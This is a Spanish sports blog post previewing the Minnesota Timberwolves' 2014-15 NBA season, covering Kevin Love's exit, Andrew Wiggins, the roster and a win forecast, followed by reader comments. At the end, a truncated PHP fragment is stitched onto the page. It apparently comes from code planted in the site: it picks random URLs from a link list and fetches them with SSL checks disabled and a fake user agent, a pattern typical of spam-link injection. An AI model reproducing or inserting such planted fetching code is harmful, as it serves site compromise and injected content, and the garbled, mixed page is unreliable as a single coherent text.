Minnesota Timberwolves 2014-2015: Corazón partido

21 de October de 2014 por TheDeerHunter

Se acabó la era Love. La etapa se cierra mucho menos brillante de lo que hubiéramos previsto aunque también de manera más esperanzadora de cómo lo han hecho otros ciclos de ilustres hombres franquicia. Lo cierto es que se veía venir la salida por la puerta de atrás de Love. Desde aquellas declaraciones poniendo en duda su categoría nunca fue lo mismo. O tal vez sí, porque irónicamente jamás logró liderar a los suyos hasta playoffs. Por su parte Ricky Rubio no ha tardado en ofrecerse a recoger el testigo, al menos salarialmente, con unas pretensiones de renovación, casi diríamos, demenciales. Esperemos que la nueva historia de amor con Andrew Wiggins resulte algo más fructífera y apasionada.

Wolves 2014_2015

Movimientos clave

Entradas y salidas críticas que cambian radicalmente la fisonomía proyecto. Ha partido el eje de todo durante los últimos años, pero a cambio llega la “madre de todas las promesas”, Andrew Wiggins. Con él llega un grupo de jóvenes de gran potencial, incluido el decepcionante número 1 del draft del año pasado, Anthony Bennet. Apuestan por estar más acertados con él de lo que estuvieron los Cavs, aunque desde el principio parte por detrás en la rotación de otro ilustre recién llegado como es Thaddeus Young. Ninguno de los dos parece estar llamado a resolver los problemas defensivos en la zona que sufrían crónicamente con Love. De los rookies Zach LaVine y Glenn Robinson III dependerá la necesaria mejora de anotación en las alas. Mo Williams también ayudará en el lanzamiento exterior, pero se antoja algo redundante con Barea y tampoco soluciona la “esquizofrenia” que provocaba en el ataque el curso pasado el antagónico estilo de dirección de dos bases como los que había. Por cierto, vuelve a casa un viejo conocido, Flip Saunders, el único técnico con el que los Wolves han conocido las mieles de postemporada.

Qué esperamos de ellos

Con tanto cambio no se pueden pretender excelsos resultados y menos en esta conferencia. Tampoco va a ser fácil olvidar a un jugador tan brillante y tan querido por la afición como Kevin Love. Por otro lado, el equipo parece que parte algo más equilibrado que el año pasado, con apuestas y riesgos más diversificados. Sea como sea el objetivo no puede ser otro que cimentar de la mejor manera posible el proyecto vigente. No se van a ver muchas victorias locales este curso en el Target Center.

Pronóstico

Alrededor de 25 victorias. Zona baja del Oeste.

Plantilla

PG: Ricky Rubio, Mo Williams, J.J. Barea
SG: Kevin Martin, Zach LaVine(R), Glenn Robinson III(R)
SF: Andrew Wiggins(R), Corey Brewer, Chase Budinger, Shabazz Muhammad, Robie Hummel
PF: Thaddeus Young, Anthony Bennett
C: Nikola Pekovic, Gorgui Dieng, Ronny Turiaf

Bajas: Kevin Love (CLE), Luc Mbah a Moute (PHI), Alexey Shved (PHI), Dante Cunningham, Othyus Jeffers

Comenta

10 comentarios a esta entrada

  1. iker dice:
    #1

    pues yo creo que tienen un equiparo, no para entrar en playoff este año pero para dar mas de un susto en temporada regular. tienen dos hombres de calidad por puesto, tienen a wiggins que si da lo que se espera de el pueden hacer muy buena temporada. y a anthony bennet se le ha visto muy fino en esta pretemporada.

      Citar

  2. txusma dice:
    #2

    Darán espectáculo (ojo a los muelles de Lavine) pero no ganarán partidos. Los veo corriendo arriba y abajo sin parar y no tengo claro como pega Nikola Pekovic en ese estilo de juego.

      Citar

  3. MagicJohnson32 dice:
    #3

    No sé qué me ha impresionado más de LaVine, sus muelles o los pedruscazos que se tira. ¡¡¡Wilmaaaaaaaaaaaaaaaaaa!!!

    Es un buen proyecto, pero les va a costar ganar partidos. Serán un buen equipo en transición, pero sin una buena defensa eso no sirve de mucho y en estático pinta bastante mal el tema.

    En todo caso, el balance de victorias no es importante ahora mismo, se trata de perfilar el proyecto y dar carrete a los jóvenes.

      Citar

  4. franitis dice:
    #4

    Lo que me parece un absurdo son las pretensiones de Ricky… Que sí, que ahora con el contratazo televisivo los conceptos salariales cambian al alza, pero a pesar de ello no ha demostrado con regularidad aún lo que se espera de él y durante casi un año lesionado ha estado cobrando sin jugar… Me parece que se “sube un poco a la parra”, ¿no?

      Citar

  5. Denise dice:
    #5

    franitis:
    Lo que me parece un absurdo son las pretensiones de Ricky… Que sí, que ahora con el contratazo televisivo los conceptos salariales cambian al alza, pero a pesar de ello no ha demostrado con regularidad aún lo que se espera de él y durante casi un año lesionado ha estado cobrando sin jugar… Me parece que se “sube un poco a la parra”, ¿no?

    Agree…no le doy el contrato que pide ni harto vino, mas aun con la de bases que hay hoy en día, ya que para mi es la posición donde mas calidad hay en la liga. Primero que aprenda a tirar y a jugar en estatico y luego que pida el maximo.

    Creo que los Wolves no harán PO por la dureza del Oeste aunque tienen buena base. Wiggins creo que no será determinante este año, y Lavine debió haberse presentado al Draft del año que viene. En el que sí confío es Bennet, obviamente dejó el listón tan bajo el año pasado que solo puede mejorar, pero lejos de los focos de estos rutilantes Cavs y con la tranquilidad de que no hay mucha profundidad en su posición y que va a tener minutos, creo que si la salud le acompaña puede hacer unos promedios decentes tipo 10 puntos, 6 rebotes en 22 minutos que le den confianza para el futuro.

      Citar

  6. Azabel dice:
    #6

    no termino de entender a Saunders fichando a Young y a Mo, dos jugadores grandes que no van ayudar demasiado y que ponen al equipo como una posible opción a PO o al que al menos lo intentaran

    con tantos jóvenes, este año deberían perder tantos y tantos partidos que a nadie deberia importarle, pero generando falsas expectativas, lo único que hacen es poner demasiada presión en Wiggins y Bennett y este ultimo no parece llevarse bien con eso

    yo hubiese vendido a Pekovic y Barea a cambio de lo que me den y jugaba a ser tan malo como los 76ers a fin de llevarme otro pick 1,

    Lo de rubio es sencillo, pide una fortuna por que cree que otro equipo se lo va a pagar, se estrellara contra la pared al mejor estilo bledsoe

      Citar

  7. rumbero dice:
    #7

    TIene pinta de ser ser un equipo entretenido de ver pero que se puede hinchar a perder partidos. Yo entre tanta promesa al que tengo ganas de ver es a Dieng. Ya apuntó maneras al final de la temporada pasada con tanta lesión en los Wolves y en el Mundial el tio se salió. En la NBA aún se le ven carencias, pero para empezar quizás sea el que más puede ayudar en el aspecto defensivo en la pintura. A ver cuantos minutos le deja Pekovic y sus lesiones

      Citar

  8. GreenPride dice:
    #8

    PO son un sueño para este equipo
    Que Ricky no vale lo que pide hoy dia en la NBA es evidente.
    Deseando ver que clase de jugador es este Wiggings del que tanto se habla ahora en una competición de verdad.
    Loteria y a evolucionar

      Citar

  9. HisRoyalAirness dice:
    #9

    Si a Ricky no le pagan los Wolves el año que viene se lo paga Larry Bird. Acordaros de este comentario.
    Y hay defensas mucho peores que la de los Wolves, Rubio por mucho que digáis es un defensor excelente, Wiggins es correctisimo en ese aspecto y Bennet y Dieng otro tanto de lo mismo.
    No harán playoffs pero porque están donde están

      Citar

  10. campo2 dice:
    #10

    Rubio lo que quiere es salir de Minesota, nunca quiso ir, quiere un a ciudad mas grande con mayor mercado o por lo menos que tenga mejor clima, y pidiendo dinero, que sabe que no merece, es la manera de forzar su salida como agente libre o de que lo traspasen.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>